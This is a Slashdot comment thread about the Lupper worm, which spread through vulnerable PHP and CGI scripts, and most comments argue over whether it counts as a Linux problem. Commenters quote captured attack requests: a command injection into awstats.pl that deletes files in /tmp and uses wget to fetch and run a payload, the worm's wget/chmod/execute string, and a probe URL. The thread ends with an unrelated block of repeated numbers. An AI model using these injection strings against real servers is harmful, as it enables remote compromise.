Linux Lupper.Worm In the WIld

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."

CONTINUE:

[xtracto]

Next, is a collection of messages telling that it is the fault of the system andministrators and not a problem of the Linux Distributions.

p.s. BURN KARMA BURN!

Re:CONTINUE:

[EraserMouseMan]

Of course, Linux is perfect by definition.

And I'm sure this worm was written by a Microsoftie or possibly by Bill Gates himself.

Re:CONTINUE:

[freeweed]

Well, actually, yes. Seeing as no Linux distibution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.

Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.

Re:CONTINUE:

[ksjfhdsalf]

Your damn right it's the system admin's fault. Because the worm can only get in if your linux server "is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed". Not like you couldn't fuck a windows server the same way. ...upload - FuckYou.bat ...execute - www.dumbass.com/UnsecureDir/FuckYou.bat

Re:CONTINUE:

[clickster]

Would you accept the same excuse for IIS?

Re:CONTINUE:

Eh, it wouldn't be the same excuse, since you have made a category error.

Re:CONTINUE:

[clickster]

category error? For arguments sake, can you be more specific on what you mean by that?

Re:CONTINUE:

[thousandinone]

No windows server installs IIS by default.

Re:CONTINUE:

[VMEbus]

I seem to recall a couple of Linux distros that DO install and run
a web browser the first time you log in. Definately Knoppix does,
(although it's Konquerer) and I think Ubuntu did as well.

I don't consider this a problem... just pointing it out.

Re:CONTINUE:

Someone hit him over the head with a big cluestick, please. Don't hold back, hit him hard.

Re:CONTINUE:

[Enahs]

I'll step in just for giggles: Category Error

Re:CONTINUE:

"Seeing as no Linux distibution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders."

What comes after the word "plus"?

Re:CONTINUE:

[LittLe3Lue]

The real question is, are those options default in an apache setup?

If so, it is definetally flawed, apache, not linux per-se, unless the worm itself uses other linux bugs after it has been downloaded.

If the setting are not default, then it is still apache's fault but is not as severe a problem (as per >50% all installs left default/near default).

Should i worry about my webserver?

Re:CONTINUE:

WebSERVER vs. webBROWSER
Or should we consider your comment as a joke?

Re:CONTINUE:

[idonthack]

GP: "webserver"

P: "web browser"

Major difference.

Re:CONTINUE:

[freeweed]

Sure, if you're including a 3rd party add-on scripting system that actually contains the vulnerability.

However, I was more thinking along the lines of zobot or the various RPC worms as of late.

To recap:

An OS worm means it exploits a base OS install. Something in Windows (RPC, PNP), or Linux (none so far). Morris would be the first example of this, of course :) VERY DANGEROUS WORMS.

A webserver worm means it exploits the webserver. IIS (Code Red, Nimda, et al), or Apache (we've seen a few here, names escape me at the moment). Neither IIS nor Apache is running with a default installation of either Windows or Linux, these days, so the effect is mitigated somewhat.

3rd party add-on worm means it exploits a 3rd party component that is installed entirely at a user's whim. This is one that works under Linux. Can't think of any in the Windows world, unless the recent IM worms are starting to spread without user interaction. Very limited effects, unless it's a highly popular add-on.

Re:CONTINUE:

[Omniscientist]

Well it is nice to know that I am a somewhat responsible administrator, as it seems like I survived an attack. In my logs I was wondering why I was getting random hits on pages such as "xmlrpc.php" when I didn't have any pages named that. This happened 7 days ago by the way, so it must be around that old.

I find it kind of strange however that if you go to services/xmlrpc.php on my website, you get a webpage that is actually services.html. No services/xmlrpc.php or even services directory exists in my htdocs folder. Going to plain xmlrpc.php brings up a 404. However I scanned for open UDP ports and neither 7111 or 7222 are open, so according to McAfee I'm not infected. I'm probably just unknowledgable on what xmlrpc.php is, but it is still strange.

Re:CONTINUE:

[budgenator]

Would you accept the same excuse for IIS?
FTA I don't see where it a linux worm, or even an appache worm it's primarily attacking php scripts even then it's only capable of attacking php scripts in servers that are configured to allow 2 very well known security configuration flaws and one that's recomemded against. NOTE the windows ME-XP instructions on the page.

Re:CONTINUE:

[Trepalium]

Well, would you blame Microsoft for the vulnerabilities in aspWebCalendar 4.x or ASP Nuke? Or perhaps it's Microsoft's fault that there is a exploitable flaw in Macromedia Flash Player (it's an option during the IE6 install)? If you want to complain about double standards, how about we start with that one?

Re:CONTINUE:

You win the clueless nutsack of the year award. Good job.

Re:CONTINUE:

[digismack]

But, does it run on Lin.. wait..

Re:CONTINUE:

[rtb61]

Only if the worm turns and starts to attack windoze boxen instead, thats the defining nature of redmond code, bugs.

Re:CONTINUE:

[trick-knee]

hey, that's a cool site. I liked this: http://wiki.cotch.net/index.php/Category:Fallacies .
is it your site?

Re:CONTINUE:

[tinkertim]

People it is really not hard to find and detect this.

If you maintain a public web server that offers space to the masses at low cost, you better read up on :

lsof
netstat

Reminder - all fedora / rhel users , /dev/shm exists on your system and by default allows code to execute.

Reminder to apache users, /apache_root/apache/proxy exists on any new installation (for the most part) and is world-writeable , executable and owned by nobody.

Don't go forcing phpsuexec and checking gid's on port 80 via iptables. Just realize what is world writeable and executable that uid 99 can get to (generally, "nobody").

Even on public servers, creative usage of loop devices can save you a lot of late nigh aggravation answering abuse tickets.

Most hosting companies can *not* disable some of the php functionality such as shell_exec, passthru, file_get_contents, etc. It breaks too much functionality for their customers. They really have no choice but to leave a somewhat inherently insecure setup running else they can not compete with those who do.

If you get hammered, *please* just send them a polite report and ask them to locate it. Most will use mod_security, again, this can be tuned to ignore whatever malformed URL's this new variant sends.

Why does this matter to those who do not run a hosting company? Because 90% of the abuse you receive is probably coming from a compromised webserver. If everyone is very watchful over the next few weeks this will pass without too much annoyance.

Slapper is the most annoying but not the end of the world.

HTH

tinkertim

Re:CONTINUE:

[EraserMouseMan]

That made absolutely no sense whatsoever.

Re:CONTINUE:

[Nutria]

Would you accept the same excuse for IIS?

Well, no.

See, there are 2 factors here:

• Windows, SQL Server, IIS, .NET, ActiveX & IE are all created by a single company, the s/w colossus Microsoft.
  
• The vituperation that should be aimed at MSFT is often wrongly aimed at "Windows". If IIS, SQL Server & IE were all written by separate non-MSFT companies, and MSFT only built the base OS (no IE, no WMP, no Office) and VisualStudio, then MSFT would obviously take a lot less heat.

Re:CONTINUE:

[kimvette]

Really?

Windows Web Server edition?
Small Business Server (all editions?)

Re:CONTINUE:

Dated versions not available for sale anymore- yes.
Current versions available for sale- no.

Re:CONTINUE:

Well, yes it is partially their fault. /tmp should be mounted on a seperate partition and mounted as noexec, then the worm wouldn't be able to execute.

Remarkably Useless page.

[Short+Circuit]

First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.

Second, how do you remove it? Quoth the page:

Removal Instructions
AVERT recommends to always use latest DATs and engine . This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Re:Remarkably Useless page.

[TheSpoom]

It doesn't say what software it tries to exploit but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.

I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.

Re:Remarkably Useless page.

[gowen]

According to ZDNet/Symantec

"The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.

The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services."

Re:Remarkably Useless page.

[tomhudson]

More alarmist shit (and old news at tht - The Reg reported this last week).

Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.

The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.

Re:Remarkably Useless page.

The McAfee page does not list the actual scripts just potential locations for the script. Hence you are a troll.

Re:Remarkably Useless page.

[tomhudson]

I wouldn't call the gp poster a troll. I'd say its more like the antivirus company trolling us. The only reason the risk is rated "low" is because their rating scale doesn't go below that.

Re:Remarkably Useless page.

[Viper+Daimao]

The XML-RPC flaw affects blogging, [and] wiki ... software

Are we sure this is a bad thing?

Re:Remarkably Useless page.

[harlows_monkeys]

More alarmist shit (and old news at tht - The Reg reported this last week)

My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.

This indicates that this is indeed in the wild, and active, and spreading.

Thus, it is not alarmist shit.

Re:Remarkably Useless page.

[tomhudson]

The key word is "attempts".

Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?

The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.

Now:

1. If you haven't updated your machine in years
2. If you have those particular scripts installed
3. If you allow files in /tmp to be run by processes from user "nobody"

... that's a LOT of ifs ...

In other words, nothing to see here but more antivirus vendor fud.

Re:Remarkably Useless page.

[tomhudson]

I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/

Knock yourselves out :-)

Re:Remarkably Useless page.

[j-cloth]

My logs are full of attempts on those pages as well. Interestingly, the UA comes up as IE6 on Win98.

203.75.99.18 - - [30/Jul/2005:06:30:39 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;r m%20-rf%20*;killall%20-9%20perl;wget%20www.pulamea suxtefute.com/sess_3539283e27d73cae29fe2b80f9293f5 9;perl%20sess_3539283e27d73cae29fe2b80f9293f59;ech o%20;echo| HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Yes, it's trivial to fake a UA, but it's still odd.

Re:Remarkably Useless page.

[CowboyBob500]

Well so far this month I've had exactly 5 hits asking for the various URLs on my main webserver so from over here the problem is most definitiely overstated.

Bob

Re:Remarkably Useless page.

[dp101270]

I see records in my httpd logs of this thing trying to exploit my server as far back as October 9th. FYI, DP

Re:Remarkably Useless page.

[Kiaser+Zohsay]

I see two attempts on the "awstats" series of URLs in five weeks worth of Apache logs, one from Oct 17, and another from Oct 21. Not exactly breaking down the door, are they? Code Red lit up our logs like a christmas tree. Now *that* was widespread.

Re:Remarkably Useless page.

That's a paypal scam. Bring it down!
# ping -f 127.0.0.1

Re:Remarkably Useless page.

er, where exactly do you think these "attempts" are coming from? It's been classified as a worm for a reason.

Re:Remarkably Useless page.

... that's a LOT of ifs ...
In other words, nothing to see here but more antivirus vendor fud.

But that's the way it goes. SQL Slammer had a lot of ifs too but it was pretty rampant.

Re:Remarkably Useless page.

[tomhudson]

I see records in my httpd logs of this thing trying to exploit my server as far back as October 9th. FYI, DP

... and if you had bothered to check, you would have seen that it was fixed in (wait for it) February ... this is REALLY OLD ... NOT news ...

Re:Remarkably Useless page.

[tomhudson]

But that's the way it goes. SQL Slammer had a lot of ifs too but it was pretty rampant.

Slammer? Didn't bother me at all ...

Systems Not Affected:,
DOS, Linux, Macintosh, Novell Netware, OS/2, UNIX,

... all it did was make for bigger log files ...

Re:Remarkably Useless page.

[tomhudson]

er, where exactly do you think these "attempts" are coming from? It's been classified as a worm for a reason.

it was mis-classified as a "linux" worm, even though it has zero to do with linux. It's a bug in several php 3rd-party scripts, it was fixed months ago, and today is Troll Tuesday, and the editors are messing with your heads.

sure, if I want I could set a box up to partake in the fun (get an older distro, make sure it has the right files, and put it on the net ... and wait pretty much forever for it to get wormed. It's not that prevailent, it's not that capable of propagating itself (there aren't that many vulnerable hosts out there), yadda yadda yadda ...

Remember, symantec and Mcafee and the rest are looking at their market pretty much disappearing over the next 2 years. Microsoft is going to be selling their own anti-virus, and most people will go with that as a default, even if there are much better products out there.

It's the same situation with firefox and openoffice - both much better products than Internet Exploder and Word, but people stick with what they've got because they're lazy and/or stupid and/or timid and/or its "good enough".

So just who are the antivirus vendors going to sell to in the future? Its not like you need any special tools to clean up a unix box with a bad script - last I looked, vi and/or rm came with every system. As for bad binaries, well, unlike certain OTHER systems, we have the source ... we're not dependent on vendors for patching binaries, nor on antivirus vendors for "cleaning" infected binaries.

So, again, the antivirus vendors are looking at a diminishing market base over the next few years. Time for them to start hiring some black hats and creating as many worms as they can.

Re:Remarkably Useless page.

[tomhudson]

... and if your box stops working, you've probably been pwned. If your updated anti-virus software doesn't detect a virus, you're pwned! Better reformat, just to be sure...

Re:Remarkably Useless page.

[Stephen+Samuel]

Looking at the logs for one of my sites (for all of the entries from the mcafee site other than bare directory scans), I'm finding 31 hits from 4 sites with the first being October 6. All seem to have returned 404 errors.

So, something is hunting for vulnerable scripts (no big shock), but it seems far from rampant.

on the other hand, a friend of mine runs a multi-hosting site with a couple of hundred customers, and we've had to do multiple sweeps for people running out of date scritpts with holes in them that have been exploited (and then had to hunt down and clean up the resulting exploitation). Some of the customers respond to our warning messages. Others ignore the warnings and just blindly re-enable the broken scripts.

These are definitely user issues, not Linux issues. If you install and run a program you really are responsible for making sure that it's safe. Beyond a certain point, the OS can't protect you from your own stupidity.

On the other hand, if the exploit then finds a local root exploit, then I'd call that a Linux problem.

As far as I'm concerned, the distributor is responsible for holes in a default installation -- Those are often done by newbies who may not even know that a vulnerable service is running on his/her box (or even what a service is).
When you start installing add-on programs and remote scripts, their default forms are pretty much the responsibility of the people who make them available (modulo any explicit warnings they give an installer). The user, however is ultimately responsible for what he adds to his system.

Re:Remarkably Useless page.

Gee, we haven't seen that joke about 1400 fucking times.

Good one.

Re:Remarkably Useless page.

[Macrobat]

You know, if you link to a porn site, you could at least warn us.

Re:Remarkably Useless page.

[budgenator]

step one go to securityfocus and update all of the applications listed on your system.
Symptoms
Presence of the following file:
* /tmp/lupii
One of the following ports are listening:
        * UDP 7111
        * UDP 7222
so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm /tmp/lupii" su -c"touch tmp/lupii"

the worm appearent does this
echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.

Re:Remarkably Useless page.

[eventhorizon5]

>The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.

When I worked as an intern/co-op at Argonne National Laboratory back in 2001-2002 (year and a half), I was heading a project comparing the installed lab-wide Cisco IDS systems with the open-source Snort IDS on a Linux testbed machine semi-running off the fiber backbone (spanning). We detected tons of exotic exploit attempts, and I'll never forget the worms that were trying to hit NT 3.51 boxes - the guy working with me said something like "does anybody even run NT3 anymore?". Some people still run it, but it's very rare.

-eventhorizon

Re:Remarkably Useless page.

[harrkev]

I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/

Wow. Thanks. The guy who owns that computer is an idiot. It only took me ten minutes to hack in! He has a lot of warez, too, but nothing that I don't already have. I think that I'll delete a bunch of stuff to teach him a lesson.

PHP exploit, not directly a linux problem?

Seems kind of wrong to name it exclusively a linux problem.

Re:PHP exploit, not directly a linux problem?

[xyvimur]

It is admins' problem... Lazy admins...

Re:PHP exploit, not directly a linux problem?

[mysqlrocks]

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

Re:PHP exploit, not directly a linux problem?

[EraserMouseMan]

Is it possible for this exploit to occur under any other OS other than Linux? If so, then maybe Linux is not the root cause, but it is definately "a linux problem".

Re:PHP exploit, not directly a linux problem?

So if someone writes a worm that exploits a hole in a Java app, can we claim it's a Solaris-only worm? How about C#-based worms?

Re:PHP exploit, not directly a linux problem?

[sqlrob]

The worm is, since it downloads an executable.

The security holes are most likely generic.

Re:PHP exploit, not directly a linux problem?

[rbochan]

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

According to this article, AWStats was patched back in February.

Re:PHP exploit, not directly a linux problem?

[metaclous]

Drupal was patched in June and August.

Re:PHP exploit, not directly a linux problem?

[Been+on+TV]

So, since it downloads an executable, I guess it is a Linux on Intel problem or does it target other processors?

Re:PHP exploit, not directly a linux problem?

[Been+on+TV]

It keeps logging in snort on other operating systems too, but since it presumably tries to install a binary compiled for an Intel processor, it would not do much harm even if it penetrated the other layers of protection. But I guess FreeBSD and others that run Intel Linux binaries could be targeted.

Re:PHP exploit, not directly a linux problem?

[Kelson]

It also appears to target Wordpress, B2, and B2Evolution. Wordpress has been patched for months. I'd assume B2Evo has as well. B2, however, ceased development something like two years ago, after which WP and B2Evo forked from it. I'm surprised they bothered with B2 itself -- are there really that many unattended B2 blogs still out there?

Re:PHP exploit, not directly a linux problem?

Except, it's a perl executable.

Re:PHP exploit, not directly a linux problem?

[budgenator]

I've found examples of the exploit, basicaly it a bash command injection into the vulnerable server so it really doesn't run in windows, it says begin, it cd /tmp, it downloads a payload with wget, does a chmod +x /tmp/lupii, then runs lupii as user nobody. luppi will not run in windows as far as I can tell, and the commands don't work in windows, but I think if the basic XML-RPC vulnerability existed on your windows machine, they'd have something far worse than lupii to install at hand.

How can we get some free press?

[ivan256]

Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!

Re:How can we get some free press?

[jellomizer]

Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.

Re:How can we get some free press?

[sqlrob]

IE Worm = Windows worm.

Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.

Re:How can we get some free press?

And we'll just conveniently ignore the part about Outlook, shall we?

Troll-faced monkey fucker...

Re:How can we get some free press?

[slavemowgli]

Then it should be a Linux/*BSD worm, and even that would still be misleading at best, as PHP is what's the problem here. Yes, it's PHP on specific platforms only, but the hole is in PHP, not Linux or *BSD, so it *should* be called a "PHP worm affecting Linux/*BSD platforms", or something similar.

Re:How can we get some free press?

Effect is a noun. Affect is a transitive verb.

"It only *****s Linux and BSD systems" - you want a verb. Hence, you wanted to use affect.

There are rare uses of effect as a verb and affect as a noun, but I can tell that you are quite common, so you probably don't need to know much about them.

Re:How can we get some free press?

[SmellTheCoffee]

An IE Worm or Outlook Work is absolutely **a windows worm** since they they are all designed by Microsoft and integrated tightly in the OS. Linus didn't write PHP and any Linux distro or BSD's don't require you to install PHP. You are free to install or uninstall PHP. Attributing this worm to Linux is like blaming Windows for an Adobe Acrobat vulnerability.

Re:How can we get some free press?

[cnelzie]

Except the blasted media only calls them "Computer Worms", they do not mention Windows as the problem. That is why everytime one of those stupid announcements make it onto "Good Morning America", I get a call from the boss asking if our servers are safe and everytime, I have to say, that is a Windows problem, not a Linux problem.

    It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...

Re:How can we get some free press?

It must be horrible to have to take that minute to explain it.

How do you convince yourself to go to work in the morning?

Re:How can we get some free press?

[haruchai]

Stop looking in the mirror and don't be so hard on yourself!

Re:How can we get some free press?

[chamblah]

Last I knew IE was crossplatform.

Re:How can we get some free press?

[NatasRevol]

Last I knew IE hadn't been updated in several years.

http://www.macupdate.com/info.php/id/5888

It's seriously out of date with regards to web standards and security patches. Hence, I wouldn't mention it as a crossplatform option.

Re:How can we get some free press?

[lunadog]

Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected.

Wow, a worm that actually creates Linux and BSD systems.. now this is something I have to see! ;)

Re:How can we get some free press?

Insightful? WTF! Apparently slashdot mods (today) haven't had their complete crack allotments disbursed.

This is fucking insane even for slashdot. I'm embarassed. So embarassed I'm posting as AC when I normall wouldn't. (even when I'm slamming shit like this)

*hangs head and wanders off*

Re:How can we get some free press?

[Marthisdil]

And your penis is integrated into your body, thus making you a dick.

Generalizations FTW!

Re:How can we get some free press?

[cout]

This is a common misconception. While the correct word in this case was "affect", "effect" can be a verb and "affect" can be a noun.

"Effect" as a verb means "to bring about", e.g. "those oddball open source zealots have effected a change in software development that could turn the information superhighway upside-down."

"Affect" as a noun is a term used in psychology to desribe a particular aspect of emotion, e.g. "the open source developers showed excited affect when forced to use commercial off-the-shelf software from leading software manufacturers."

Re:How can we get some free press?

[Overly+Critical+Guy]

You mean like how Outlook worms get called Windows worms on Slashdot?

Re:How can we get some free press?

[carlos_benj]

Hence: There are rare uses of effect as a verb and affect as a noun...

Re:How can we get some free press?

[Halfbaked+Plan]

Similarly, attributing a Windows worm to Windows, when it's really an Outlook worm, is a misdirected accusation. Unless it's in the NT kernel, it's not a Windows worm. It might be a Microsoft bug that causes the problem, but that doesn't make it a Windows worm. The same worm could strike on a machine running Outlook in a bochs sandbox or under wine.

Linux fans degenerating down to semantics is really, really sad.

So....

We must make an effort to get infected?

if it attacks PHP cross-platform...

[frankie]

...then it's a PHP/*nix worm, not Linux specifically.

Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.

Re:if it attacks PHP cross-platform...

Theoretically, yes, it could be modified to attack OS X. The problem is that the non-server version, at least, doesn't have PHP enabled by default, and it's not the easiest thing for a normal user to enable. Thus, it could attack OS X Server installs, assuming the administrator had enabled PHP, but that's a really small number of people. If it was a binary worm, then it just wouldn't be able to spread. Script worms are a lot easier to defend against, since they tend not to change from platform to platform, so ClamAV and similar should pick them up and block them without too much trouble.

Re:if it attacks PHP cross-platform...

[alexhs]

...then it's a PHP/*nix worm, not Linux specifically.

Not exactly. From what I understood, there are BSD and Linux variants : both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.

There's a layer available in BSD that allows to run Linux binaries natively, so Linux potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect a Linux through wine.

Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii ?

Re:if it attacks PHP cross-platform...

Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii ?

No, there aren't. Primarily because "virii" IS NOT A WORD YOU TWIT!

Re:if it attacks PHP cross-platform...

Actually, "virii" is a word. It has malchaic latin roots depicting "infectionS". Post truistic latin (circa ~578 AD) does not have semantic constructs to describe it as such, thus, even some *modern* latin "scholars" will easily dismiss it, and they are in error for doing so.

Abusus non tollit usum - in other words: just because everyone misuses the plural of virus today, does not stop you from correctly using it today as they did in the past, and which the GP does correctly with "virii"...

Re:if it attacks PHP cross-platform...

[Halfbaked+Plan]

Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii ?

Nearly everybody thinks PeeCee when they hear 'Linux.' And there are better Freenix alternatives than Linux for almost every other architecture.

Also..

[handmedowns]

The target has to be standing on one foot, and it needs to be the third wednesday of the month in February.

Really, cmon now.. this gets news? OK, Bravo.. a linux worm.. take away the fact that it's really a web vulnerability that seems to take advantage of a "shell" it could be a solaris/irix/aix/openserver/bsd worm as well..

But for the smear campaign, lets just call it the linux worm to stirr up the zealots.

Sadly a preview of things to come because...

[Assmasher]

...Linux is more and more popular with corporations holding valuable and important data.

Success is a double-edged sword. ;)

Re:Sadly a preview of things to come because...

You seem to have misspelled 'hatter' as 'masher' in your user name.

Re:Sadly a preview of things to come because...

[_Sprocket_]

You act like Linux popularity is a new thing.

The whole "wait until it gets popular" is an interesting concept - but it does tend to ignore a history of Linux (and various usual software packages bundled with "Linux" but running on other *nix platforms) being widely deployed and exposed. Linux has been under attack since the bad old days when Infosec wasn't taken seriously (or at least wasn't a viable market).

An amusing side note is that this is back when the "wait until it gets popular" argument was applied to WinNT because it really wasn't as wide-spread as it's *nix competition.

Re:Sadly a preview of things to come because...

[Questy]

Someone educate me... My php.ini lists the xmlrpc feature under the heading "Windows Extensions" and references an xmlrpc.dll, I have no further references to XML/RPC anywhere in here. Since it is an XML/RPC, wouldn't the existence of the ability to load this DLL indicate possible infectability of Windows systems as well?

Re:Sadly a preview of things to come because...

[Assmasher]

Actually, I act as though Linux's popularity in corporate America is new, and it is. That certainly doesn't mean it hasn't been in use prior to this (I've been using various flavors at Software Companies with other developers since the mid-90's) but its visibility has only relatively recently begun to embrace its promise. No longer is Linux a viable corporate solution for just those who have problems with Windows. Even those who don't have Windows issues (who're they? ;)) would benefit in many cases from using Linux in their IT strategies.

Re:Sadly a preview of things to come because...

[_Sprocket_]

Actually, I act as though Linux's popularity in corporate America is new, and it is.

Let's make sure we're using the same context here. I'm not talking market share, mind share, or penetration in to the Enterprise market. I'm talking exposure to attack... an Infosec context.

My point is that Linux has already had the exposure required to test its mettle. Further popularity will not bring about a sudden increase in reported vulnerabilities. That's not to say there won't be any further bugs found. But sufficient exposure in the past has already put many eyes on Linux and more eyes won't lead to a sudden outbreak or incremental increase.

Now - I'm more than willing to hash out arguments why Linux on a corporate intranet (or heck - their public facing servers) will lead to singificantly more exposure (with the above stated context in mind). Do you have one?

Re:Sadly a preview of things to come because...

[Assmasher]

Sorry, I meant a different context as you suspect. Most linux distributions (like my slack install) are by far more secure due to more than a decade of progressive focus on security, but what I meant by popularity is that (wonderfully) large companies and even smaller ones are finding the idea of using Linux and associated/like minded components where they can now. I had zero problems replacing a remote machine configuration we use that used to require IIS for web services with a TCP/IP server I wrote running on slackware. :)

Re:Sadly a preview of things to come because...

[budgenator]

Hears the way I understand it, the problem is some applications don't properly limit what programs can be run from a web browser
if for example type this into my browser

http://example.com/cgi/includer.cgi?'echo 'bingo''

and I see bingo in my browser example.com would probably be vulnerable, the worm presently uses a linux program wget (wget is a program that downloads files from a web server) to download the payload to the vulnerable machine, make it executeable with a chmod +x and runs it. When the worm runs, it searches for vulnerable machines on the network and and does the same things to them.

any RPC, Remote Procedure Protocol, has big impact on security, especaly commands that can change directories, download files, or make a file executable.

Re:Sadly a preview of things to come because...

[burnin1965]

Its a logical arguement, however, its not like linux is new on the block.

Back when netcraft reported OS statistics along with web server stats linux held around 30% market share, the last report was in June of 2001. And we have seen assaults on linux in the past, e.g. the slapper worm in which case it peaked at about 14000 infected machines with somewhere around 5 million in service. Even if we triple the 14000 to account for cleaned machines we are still looking at less than 1%. Compared to something like codered where hundreds of thousands of boxes were infected the infection rate of Windows boxes may have approached 10% or more.

I'd say linux has been popular long enough, has a large enough install base, and has been targeted in the past. And although the parameters should be there for mass infections and destruction it still has not materialized. About the only thing new in the past few years is media hysteria whenever one of these worms pops up and sputters for awhile.

Anyhow, now that there are some possible 20 million linux web servers out there it should be interesting to see how this worm does. I predict a dud.

burnin

Re:Sadly a preview of things to come because...

[Assmasher]

Totally agree, I'm just saying that it's a 'new thing' to corporate America because it isn't some black hole of exotic technology anymore. It's the thing that will save you money and seems to have a reasonable IT talent pool supply and hey, "our kids are using it mister CFO" ;).

Linux what?

[psyeye]

So it's just the name of the worm or does anyone seriously think this is a Linux-worm? It's a web-server worm - nothing more than that!


psyeye

Re:Linux what?

Are we sure it's not a denial of service attack?

Complete infection

[soren.harward]

All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.

Re:Complete infection

Hey, there's 13. I've patched already!

Re:Complete infection

[SlashSquatch]

...
My digital media is write-protected
Every file inspected, no viruses detected
...

Re:Complete infection

[djsmiley]

OR

Yes, all of you with a mental age of 14....

Everyone sees windows bugs, and half the time there is a patch somewhere, but no one has applied it etc. Admins ARE the problem, sack them and give me a job!

Re:Complete infection

Don't be a IFWM, and you will probably have a job.

Re:Complete infection

[bloodstains]

<USER type="Brain Dead AOLer">Me too!</USER>

Re:Complete infection

[Jesus_666]

If I ever meet you I'll CTRL-ALT-DEL you.

Re:Complete infection

[theendlessnow]

All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.

Actually, thirteen. I've already migrated back to the safety of Windows.

Re:Complete infection

Admins ARE the problem, sack them and give me a job!

Ok. I have sacked all my Sysadmins and I now happily offer you the job of Tea Boy.

What's that? You wanted one of the Sysadmin jobs? But you said sack them and give you *A* job, not sack them and give you *the* job!

Re:Complete infection

[biduxe]

Come on, Do I really will have to look for my old 80 MB Hard drive buried 10 years ago to check if this vulnerability is still a menace?

Re:Complete infection

[TheLetterPsy]

Soren, it's Mike. Send me an email since I think you are not at BYU anymore and I don't have a new email for you. Man I've been hoping you would post to /. so I could get in touch with you!

jenksster gmail com

Been around earlier?

According to http://searchsecurity.techtarget.com/qna/0,289202, sid14_gci955041,00.html, this worm started in 2002... or am I mistaken?

Re:Been around earlier?

[jurt1235]

Well, if it turns out to be a dupe, than it took forever for the fixes. For example wordpress 1.5.1 v2 is still vulnerable. 1.5.2 is now just around. Just as for some other software. I would than say that this was a seriously ignored problem.

Re:Been around earlier?

[Darth+Daver]

It took it that long to get a foothold in the wild. It must have probed a lot of systems on port 80 before discovering that specific configuration.

Re:Been around earlier?

[hawkeyeMI]

Wordpress says they're not vulnerable since 1.5: http://wordpress.org/development/2005/11/wordpress -is-secure/

Re:Been around earlier?

[smc13]

The xmlprc exploits were discovered in July and August of this year. There had been an earlier exploit in September 2001 which probably is what the worm from 2002 made use of.

http://phpxmlrpc.sourceforge.net/

OUTGOING

HELLO WORLD
73019 73019
HELLO WORLD
63025 63025 17392 17392 14423 14423 20330 20330 10502 10502
39249 39249 11666 11666 92050 92050 31489 31489 12017 12017
91449 91449 71201 71201 95063 95063 67563 67563 79077 79077
51271 51271 99720 99720 86892 86892 72445 72445 87005 87005
14701 14701 93874 93874 05152 05152 76098 76098 60587 60587
83326 83326 05000 05000 75456 75456 19169 19169 71103 71103
29614 29614 33310 33310 21885 21885 38037 38037 72288 72288
30196 30196 92021 92021 40729 40729 81165 81165 55873 55873
78412 78412 60643 60643 73637 73637 06040 06040 57886 57886
09843 09843 83878 83878 47509 47509 53767 53767 63647 63647
